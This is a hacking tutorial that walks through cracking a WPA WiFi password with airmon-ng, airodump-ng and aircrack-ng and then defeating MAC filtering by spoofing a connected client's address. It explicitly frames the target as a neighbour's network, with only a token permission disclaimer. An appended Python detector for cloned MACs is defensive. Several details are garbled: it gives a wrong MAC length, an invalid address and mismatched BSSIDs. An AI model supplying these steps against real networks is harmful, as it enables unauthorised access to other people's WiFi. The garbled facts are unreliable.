How to Hack MAC filtering network
Don’t try this on networks on which you lack permission
for penetration testing.
Intro:
MAC:
“MAC is a 42-bit address used to uniquely identify a device.”
“MAC filtering is a way in which the network administrator allows only specific MAC addresses to connect to the router.”
Let’s divide this topic into two parts:
[-] Crack WiFi network.
[-] Get into it even if MAC filtering is enabled.
Tools:
1-Kali Linux
Rather than downloading the tools separately and spending your time configuring them, download “Kali Linux”, because it ships with all the tools used here.
2-Wireless card capable of monitoring
If you have both, then let’s start:
Crack a WiFi network:
First disconnect all wireless connections.
Open your terminal:
Command: airmon-ng start [your WLAN card]
If you don’t know the name of your WLAN card, open a terminal, type ifconfig and check the name there; all network adapters will be listed.
It is usually “wlan0”, so let’s use wlan0 as the network card name.
Type: airmon-ng start wlan0
Hit Enter.
It will print something like this:
Found 6 processes that could cause troub
If airodump-ng, aireplay-ng or airtun-n
a short period of time, you may want to
PID Name
661 NetworkManager
763 wpa_supplicant
1032 avahi-daemon
1036 avahi-daemon
10136 dhclient
10295 dhclient
PHY Interface Driver
phy0 wlan0 iwlwifi
(mac80211 monitor mode
(mac80211 station mode
Now your network card is in monitor mode.
You can see that monitor mode is enabled on “wlan0mon”.
Command: airodump-ng [monitor interface]
As our monitor interface is "wlan0mon":
Type: airodump-ng wlan0mon
If it gives an error like:
ioctl(SIOCSIWMODE) failed: Device or res
ARP linktype is set to 1 (Ethernet) - e
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE8021
sure RFMON is enabled: run 'airmon-ng s
Sysfs injection support was not found ei
Then use these three commands to correct it:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
Now you can see all wifi networks in yo
It will be like this:
CH 7 ][ Elapsed: 24 s ][ 2015-09-20 0
BSSID PWR Beacons #Dat
1C:sB:25:4F:93:F3 -44 27
30:B9:21:FB:5E:DB -64 19
58:3A:35:6A:60:31 -83 27
3A:6C:F5:4E:68:AB -87 9
The next command is: airodump-ng --bssid [MAC of router] -c [channel] --write [output file name] [monitor interface]
Get the MAC and channel of your target network from the output of the airodump-ng wlan0mon command.
Let’s penetrate the neighbour:
airodump-ng --bssid 1C:sB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon
Hit Enter.
It will look like:
CH 11 ][ Elapsed: 1 min ][ 2015-09-20
BSSID PWR RXQ Beacons
1C:sB:25:4F:93:F3 -44 100 716
BSSID STATION PW
1C:sB:25:4F:93:F3 18:87:96:11:9B:A8
1C:sB:25:4F:93:F3 70:0B:C0:5F:68:56
1C:sB:25:4F:93:F3 34:23:BA:28:B5:0E
1C:sB:25:4F:93:F3 44:91:DB:A5:66:78
Now, wait for the “handshake” text to appear in the terminal.
Congrats! You now have the captured handshake and it is time to crack it. You’ll get the password in plain text form, so be sure to use your best word list, because this all depends on your word list.
Open another terminal and don’t close the previous one, as we need some info from it.
Command: aircrack-ng [captured handshake file name] -w [word list]
Type: aircrack-ng WPAcrack-01.cap -w wordlist.txt
Now, pray.
If your prayer and the wordlist worked, you got the password. Now, log in to the WiFi.
At this point, you might have this question:
Q) Holy crab, what’s that authentication problem??? What should I do now??
A) You have to be cool.
This means that MAC filtering is enabled.
Get into it even if MAC filtering is enabled:
CH 11 ][ Elapsed: 1 min ][ 2015-09-20
BSSID PWR RXQ Beacons
2C:AB:25:4F:93:F3 -44 100 716
Navigate to the output of the “airodump-ng --bssid 10:AB:25:4F:93:F3 -c 11 --write WPAcrack wlan0mon” command; you can see MAC addresses under “STATION”:
BSSID STATION PW
1C:sB:25:4F:93:F3 18:87:96:11:9B:A8
1C:sB:25:4F:93:F3 70:0B:C0:5F:68:56
1C:sB:25:4F:93:F3 34:23:BA:28:B5:0E
1C:sB:25:4F:93:F3 44:91:DB:A5:66:78
Do you see ’em?
These are the MAC addresses of the users connected to the network.
Now, you might be thinking:
Q)So, let’s cool it?? :/
A) If you are thinking this, then it’s time to use brain.py
xD.
These MAC addresses are allowed to connect to the network. If you have one of these MAC addresses, the MAC filter will not block you.
Time to clone xD
Open terminal:
Command 1: ifconfig wlan0 down
Command 2: ifconfig wlan0 hw ether [desired MAC address]
Command 3: ifconfig wlan0 up
Choose one of the MAC addresses from under the STATION output. Let’s use 34:23:BA:28:B5:0E
And type:
Command 1: ifconfig wlan0 down
Command 2: ifconfig wlan0 hw ether 34:23:BA:28:B5:0E
Command 3: ifconfig wlan0 up
Type ifconfig to confirm that your MAC has changed.
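The filter cannot tell the clone from the real client, but the air can: every 802.11 radio keeps its own 12-bit sequence counter, so frames from one "address" sent by two radios arrive as two interleaved counters, usually at two different signal levels. The following added example (not part of the original post) runs that check over a constructed list of frame metadata; the station MACs are the ones from the STATION listing above, while the sequence numbers and RSSI values are made up.

```python
from collections import defaultdict
from dataclasses import dataclass

SEQ_MODULO = 4096      # 802.11 sequence numbers are 12-bit counters
MAX_FORWARD_GAP = 300  # lost frames leave small gaps; a bigger jump hints at a second sender
RSSI_JUMP = 20         # dBm swing unlikely for one stationary client


@dataclass
class Frame:
    src: str   # transmitter MAC
    seq: int   # 802.11 sequence number, 0..4095
    rssi: int  # received signal strength in dBm


def seq_delta(prev: int, cur: int) -> int:
    """Forward distance from prev to cur with wraparound (4095 -> 0 is 1)."""
    return (cur - prev) % SEQ_MODULO


def detect_cloned_macs(frames, max_gap=MAX_FORWARD_GAP, rssi_jump=RSSI_JUMP):
    """Return {mac: [reasons]} for MACs whose frames look like two radios.

    A retransmission repeats the sequence number (delta 0) and is not flagged;
    a backward jump wraps to a large delta and is.
    """
    last, alerts = {}, defaultdict(list)
    for f in frames:
        prev = last.get(f.src)
        if prev is not None:
            d = seq_delta(prev.seq, f.seq)
            if d > max_gap:
                alerts[f.src].append(f"seq {prev.seq}->{f.seq}")
            if abs(f.rssi - prev.rssi) >= rssi_jump:
                alerts[f.src].append(f"rssi {prev.rssi}->{f.rssi}")
        last[f.src] = f
    return dict(alerts)


# Constructed capture: the first MAC is one honest client (note the 4095 -> 0 wrap
# and one retry); the second MAC is being used by two radios at the same time.
SAMPLE_FRAMES = [
    Frame("18:87:96:11:9B:A8", 4094, -61), Frame("34:23:BA:28:B5:0E", 2000, -55),
    Frame("18:87:96:11:9B:A8", 4095, -62), Frame("34:23:BA:28:B5:0E", 2001, -56),
    Frame("18:87:96:11:9B:A8", 0, -60),    Frame("34:23:BA:28:B5:0E", 17, -30),
    Frame("18:87:96:11:9B:A8", 1, -61),    Frame("34:23:BA:28:B5:0E", 2002, -55),
    Frame("18:87:96:11:9B:A8", 1, -61),    Frame("34:23:BA:28:B5:0E", 18, -31),
]

if __name__ == "__main__":
    for mac, reasons in detect_cloned_macs(SAMPLE_FRAMES).items():
        print(mac, "looks cloned:", ", ".join(reasons))
```

On a real capture the frame list would come from a monitor-mode sniffer; thresholds need tuning per environment, since a roaming client also produces RSSI swings.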
Now??
Now what, man, you are already connected xD?
Do not use this hack in Pyuntaza. Ok?